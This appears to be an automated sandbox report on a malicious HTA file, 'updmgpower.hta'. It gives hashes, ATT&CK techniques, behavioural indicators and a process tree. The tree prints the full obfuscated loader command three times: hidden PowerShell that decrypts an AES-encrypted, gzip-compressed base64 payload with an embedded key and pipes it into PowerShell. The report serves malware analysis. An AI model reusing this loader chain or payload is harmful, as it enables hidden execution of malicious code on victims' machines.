0e465179f23f38136ff272da903c53f5d748384294c196d86cd920650ef536f1

General

Target

updmgpower.hta
Size

1.3MB
MD5

060c8203dacb3ae511a7bc2f02b9f98d
SHA1

aaaffce215108e8c985db92227bee0bc7a1e456c
SHA256

1e3f95ccf29c4843c72fdfef6ab27b9de474c76d89eb612abb76ff8c943d7a34
SHA512

e1e3fc49cb36b6937704a0ec02a0024dda9080926831dd1d3b82d46676f24c7b1aa2b0184c45db71d8663f4419918f9fae0e491e17d022b44e975a2f751c9f5d
SSDEEP

1536:MzVfUs/w3nlFjyqoLuZr1jMjomJH5X0sZCIZ/0K7buadkRgTQvXnBEAhM/QUbqW4:M3onlFuIR+X0pI97ZzQfnbmy0LNanyW

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1944	powershell.exe
1944	powershell.exe
1944	powershell.exe
2736	powershell.exe
2892	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeDebugPrivilege	2892	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 1932 wrote to memory of 1944	1932	mshta.exe	28
PID 1932 wrote to memory of 1944	1932	mshta.exe	28
PID 1932 wrote to memory of 1944	1932	mshta.exe	28
PID 1932 wrote to memory of 1944	1932	mshta.exe	28
PID 1944 wrote to memory of 2764	1944	powershell.exe	30
PID 1944 wrote to memory of 2764	1944	powershell.exe	30
PID 1944 wrote to memory of 2764	1944	powershell.exe	30
PID 1944 wrote to memory of 2764	1944	powershell.exe	30
PID 2764 wrote to memory of 2892	2764	cmd.exe	32
PID 2764 wrote to memory of 2892	2764	cmd.exe	32
PID 2764 wrote to memory of 2892	2764	cmd.exe	32
PID 2764 wrote to memory of 2892	2764	cmd.exe	32
PID 2764 wrote to memory of 2736	2764	cmd.exe	33
PID 2764 wrote to memory of 2736	2764	cmd.exe	33
PID 2764 wrote to memory of 2736	2764	cmd.exe	33
PID 2764 wrote to memory of 2736	2764	cmd.exe	33

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\updmgpower.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1932
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $lYSy = 'AAAAAAAAAAAAAAAAAAAAACo/uNMd3GaeKSYlYiHke6mPen33RvZiuADfb2N+DsrG7TE1QXrIudTxSwZddnPd5taoKj5ZN0kYyja5SS7odxfksCVS7U5omQKUYVbyie8I/5cWCPj0X4V1rh7SOURRirZha4xFkxycKwxSUaXTt0TCyR9/BtYOjJ9hEKbdO051P9uAoRUEOpCnWiPIw5ZT9uuCJ79CfOxk6owHRYBMCcnm1Lm66mS5lIxBz0FrWrtn2zP1NbAVS0f0U0TDx4S+G6Q+cctuR/LcO0w84LBK1VpFHw5Tpe9XBKcHQP4dALPCB6d/IOnrVKTgywymceAD2OiVYHClxSO3Ph+ReLjcz6OM2jv5ucA6ENEjbADik+m5Bsj4/KlTe3SeONgrtkI7XNx09fQqQGyXg8YCiTzNDnk3JcWb6yuIyYlPQ6jJlrIQcGkC4p7mLlnMmYqbj1KoN98RRxpTkAvJyjKZQdIDopisRGHJWdtUiObIDF7TyB7cu4hAe0CLcunUwIUDoKmjfaob/nO7XhS6JP3zOLLvwWuJ2Tnj0fhvxF1y3oO2UIt6mTdVN9HUw2HkDF7YyQfHylMS5YGSCIxpW/dLPKXAMTM3nIjjgtYKiiJ+abzly4EBNswEK9Jpc9OPgxIcFINY2POwV7bg0su15sG9pgvncg+ND7CiINjxSsoW/w456NDyuOgp0IIsHL30wfkkqcUok+uSzTNeba71xPy6nUHgdJXLhyeUubkQsHdlHfftU2uw9W7jgZYuUgOiX6bcI0ENSoJCHjgltZNlik57YwbPUIHzqALK1iKwAW/Bbudeq9pKx3m45dK6i6i1b9mkpcqW2Cy7XFabY4hzSK0GTJuWJFpMGOh4RcrWV3hxfsp/q0mhYE9Vbd1oTqXqhAwuBT/3FDFbEuL2rM6fL6F8K1yU12E8j87N6IIGoCZc+PmXb1Lb+XYPe//TXakyR0pAMy1fSGpT+vhNJajbz2HQlgAOeoMLmHqxeWfMWbvOVhm86igzAkY94UFgmSMXSWRm+RGr+TY1vrV1iVde7JP94gzM1QVhHcQc/keUK8Zr2LpK0WOe4Nt0+5ezrMUh9RRBczsZSw==';$pVEWBtj = 'eFpuYk9QQ3ZYb3RWVGdWcmhtY25QWW1qc1dNektZd3k=';$CLwidN = New-Object 'System.Security.Cryptography.AesManaged';$CLwidN.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CLwidN.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CLwidN.BlockSize = 128;$CLwidN.KeySize = 256;$CLwidN.Key = [System.Convert]::FromBase64String($pVEWBtj);$yYfGJ = [System.Convert]::FromBase64String($lYSy);$GNNtGeOF = $yYfGJ[0..15];$CLwidN.IV = $GNNtGeOF;$QuHjugNWv = $CLwidN.CreateDecryptor();$mEinihCZX = $QuHjugNWv.TransformFinalBlock($yYfGJ, 16, $yYfGJ.Length - 16);$CLwidN.Dispose();$SsQetEs = New-Object System.IO.MemoryStream( , $mEinihCZX );$YaxnGM = New-Object System.IO.MemoryStream;$axfWSsykS = New-Object System.IO.Compression.GzipStream $SsQetEs, ([IO.Compression.CompressionMode]::Decompress);$axfWSsykS.CopyTo( $YaxnGM );$axfWSsykS.Close();$SsQetEs.Close();[byte[]] $VgPKdva = $YaxnGM.ToArray();$YfLTiD = [System.Text.Encoding]::UTF8.GetString($VgPKdva);$YfLTiD | powershell - }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1944
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c powershell.exe $lYSy = 'AAAAAAAAAAAAAAAAAAAAACo/uNMd3GaeKSYlYiHke6mPen33RvZiuADfb2N+DsrG7TE1QXrIudTxSwZddnPd5taoKj5ZN0kYyja5SS7odxfksCVS7U5omQKUYVbyie8I/5cWCPj0X4V1rh7SOURRirZha4xFkxycKwxSUaXTt0TCyR9/BtYOjJ9hEKbdO051P9uAoRUEOpCnWiPIw5ZT9uuCJ79CfOxk6owHRYBMCcnm1Lm66mS5lIxBz0FrWrtn2zP1NbAVS0f0U0TDx4S+G6Q+cctuR/LcO0w84LBK1VpFHw5Tpe9XBKcHQP4dALPCB6d/IOnrVKTgywymceAD2OiVYHClxSO3Ph+ReLjcz6OM2jv5ucA6ENEjbADik+m5Bsj4/KlTe3SeONgrtkI7XNx09fQqQGyXg8YCiTzNDnk3JcWb6yuIyYlPQ6jJlrIQcGkC4p7mLlnMmYqbj1KoN98RRxpTkAvJyjKZQdIDopisRGHJWdtUiObIDF7TyB7cu4hAe0CLcunUwIUDoKmjfaob/nO7XhS6JP3zOLLvwWuJ2Tnj0fhvxF1y3oO2UIt6mTdVN9HUw2HkDF7YyQfHylMS5YGSCIxpW/dLPKXAMTM3nIjjgtYKiiJ+abzly4EBNswEK9Jpc9OPgxIcFINY2POwV7bg0su15sG9pgvncg+ND7CiINjxSsoW/w456NDyuOgp0IIsHL30wfkkqcUok+uSzTNeba71xPy6nUHgdJXLhyeUubkQsHdlHfftU2uw9W7jgZYuUgOiX6bcI0ENSoJCHjgltZNlik57YwbPUIHzqALK1iKwAW/Bbudeq9pKx3m45dK6i6i1b9mkpcqW2Cy7XFabY4hzSK0GTJuWJFpMGOh4RcrWV3hxfsp/q0mhYE9Vbd1oTqXqhAwuBT/3FDFbEuL2rM6fL6F8K1yU12E8j87N6IIGoCZc+PmXb1Lb+XYPe//TXakyR0pAMy1fSGpT+vhNJajbz2HQlgAOeoMLmHqxeWfMWbvOVhm86igzAkY94UFgmSMXSWRm+RGr+TY1vrV1iVde7JP94gzM1QVhHcQc/keUK8Zr2LpK0WOe4Nt0+5ezrMUh9RRBczsZSw==';$pVEWBtj = 'eFpuYk9QQ3ZYb3RWVGdWcmhtY25QWW1qc1dNektZd3k=';$CLwidN = New-Object 'System.Security.Cryptography.AesManaged';$CLwidN.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CLwidN.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CLwidN.BlockSize = 128;$CLwidN.KeySize = 256;$CLwidN.Key = [System.Convert]::FromBase64String($pVEWBtj);$yYfGJ = [System.Convert]::FromBase64String($lYSy);$GNNtGeOF = $yYfGJ[0..15];$CLwidN.IV = $GNNtGeOF;$QuHjugNWv = $CLwidN.CreateDecryptor();$mEinihCZX = $QuHjugNWv.TransformFinalBlock($yYfGJ, 16, $yYfGJ.Length - 16);$CLwidN.Dispose();$SsQetEs = New-Object System.IO.MemoryStream( , $mEinihCZX );$YaxnGM = New-Object System.IO.MemoryStream;$axfWSsykS = New-Object System.IO.Compression.GzipStream $SsQetEs, ([IO.Compression.CompressionMode]::Decompress);$axfWSsykS.CopyTo( $YaxnGM );$axfWSsykS.Close();$SsQetEs.Close();[byte[]] $VgPKdva = $YaxnGM.ToArray();$YfLTiD = [System.Text.Encoding]::UTF8.GetString($VgPKdva);$YfLTiD | powershell -
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2764
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe $lYSy = 'AAAAAAAAAAAAAAAAAAAAACo/uNMd3GaeKSYlYiHke6mPen33RvZiuADfb2N+DsrG7TE1QXrIudTxSwZddnPd5taoKj5ZN0kYyja5SS7odxfksCVS7U5omQKUYVbyie8I/5cWCPj0X4V1rh7SOURRirZha4xFkxycKwxSUaXTt0TCyR9/BtYOjJ9hEKbdO051P9uAoRUEOpCnWiPIw5ZT9uuCJ79CfOxk6owHRYBMCcnm1Lm66mS5lIxBz0FrWrtn2zP1NbAVS0f0U0TDx4S+G6Q+cctuR/LcO0w84LBK1VpFHw5Tpe9XBKcHQP4dALPCB6d/IOnrVKTgywymceAD2OiVYHClxSO3Ph+ReLjcz6OM2jv5ucA6ENEjbADik+m5Bsj4/KlTe3SeONgrtkI7XNx09fQqQGyXg8YCiTzNDnk3JcWb6yuIyYlPQ6jJlrIQcGkC4p7mLlnMmYqbj1KoN98RRxpTkAvJyjKZQdIDopisRGHJWdtUiObIDF7TyB7cu4hAe0CLcunUwIUDoKmjfaob/nO7XhS6JP3zOLLvwWuJ2Tnj0fhvxF1y3oO2UIt6mTdVN9HUw2HkDF7YyQfHylMS5YGSCIxpW/dLPKXAMTM3nIjjgtYKiiJ+abzly4EBNswEK9Jpc9OPgxIcFINY2POwV7bg0su15sG9pgvncg+ND7CiINjxSsoW/w456NDyuOgp0IIsHL30wfkkqcUok+uSzTNeba71xPy6nUHgdJXLhyeUubkQsHdlHfftU2uw9W7jgZYuUgOiX6bcI0ENSoJCHjgltZNlik57YwbPUIHzqALK1iKwAW/Bbudeq9pKx3m45dK6i6i1b9mkpcqW2Cy7XFabY4hzSK0GTJuWJFpMGOh4RcrWV3hxfsp/q0mhYE9Vbd1oTqXqhAwuBT/3FDFbEuL2rM6fL6F8K1yU12E8j87N6IIGoCZc+PmXb1Lb+XYPe//TXakyR0pAMy1fSGpT+vhNJajbz2HQlgAOeoMLmHqxeWfMWbvOVhm86igzAkY94UFgmSMXSWRm+RGr+TY1vrV1iVde7JP94gzM1QVhHcQc/keUK8Zr2LpK0WOe4Nt0+5ezrMUh9RRBczsZSw==';$pVEWBtj = 'eFpuYk9QQ3ZYb3RWVGdWcmhtY25QWW1qc1dNektZd3k=';$CLwidN = New-Object 'System.Security.Cryptography.AesManaged';$CLwidN.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CLwidN.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CLwidN.BlockSize = 128;$CLwidN.KeySize = 256;$CLwidN.Key = [System.Convert]::FromBase64String($pVEWBtj);$yYfGJ = [System.Convert]::FromBase64String($lYSy);$GNNtGeOF = $yYfGJ[0..15];$CLwidN.IV = $GNNtGeOF;$QuHjugNWv = $CLwidN.CreateDecryptor();$mEinihCZX = $QuHjugNWv.TransformFinalBlock($yYfGJ, 16, $yYfGJ.Length - 16);$CLwidN.Dispose();$SsQetEs = New-Object System.IO.MemoryStream( , $mEinihCZX );$YaxnGM = New-Object System.IO.MemoryStream;$axfWSsykS = New-Object System.IO.Compression.GzipStream $SsQetEs, ([IO.Compression.CompressionMode]::Decompress);$axfWSsykS.CopyTo( $YaxnGM );$axfWSsykS.Close();$SsQetEs.Close();[byte[]] $VgPKdva = $YaxnGM.ToArray();$YfLTiD = [System.Text.Encoding]::UTF8.GetString($VgPKdva);$YfLTiD
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2892
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2736

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
537a227bcb64d1d8b2e76a7134465c14

SHA1
7d5215cd25bf268b6d6b859b6a16648be71c1efa

SHA256
6054ddbbf13161641118ef295d9459090ca0302fee5ce4e34f24e6f126b49c9c

SHA512
e5938de3840a4121bcc6bbb7dbb2bc8c2b06df6eca48f5b2338c92c961843bbf9fda79cbf4925d5e7e08926ce323d3959d1b50c607d9d56696caf0554a3526b8

Download Submit
memory/1944-11-0x0000000072800000-0x0000000072DAB000-memory.dmp

Filesize
5.7MB

Download
memory/1944-12-0x0000000072800000-0x0000000072DAB000-memory.dmp

Filesize
5.7MB

Download
memory/1944-13-0x0000000002740000-0x0000000002780000-memory.dmp

Filesize
256KB

Download
memory/1944-14-0x0000000002740000-0x0000000002780000-memory.dmp

Filesize
256KB

Download
memory/1944-15-0x0000000072800000-0x0000000072DAB000-memory.dmp

Filesize
5.7MB

Download
memory/2736-26-0x0000000074D70000-0x000000007531B000-memory.dmp

Filesize
5.7MB

Download
memory/2736-28-0x00000000025A0000-0x00000000025E0000-memory.dmp

Filesize
256KB

Download
memory/2736-27-0x0000000074D70000-0x000000007531B000-memory.dmp

Filesize
5.7MB

Download
memory/2736-33-0x0000000074D70000-0x000000007531B000-memory.dmp

Filesize
5.7MB

Download
memory/2892-31-0x0000000074D70000-0x000000007531B000-memory.dmp

Filesize
5.7MB

Download
memory/2892-30-0x0000000002380000-0x00000000023C0000-memory.dmp

Filesize
256KB

Download
memory/2892-29-0x0000000074D70000-0x000000007531B000-memory.dmp

Filesize
5.7MB

Download
memory/2892-32-0x0000000074D70000-0x000000007531B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing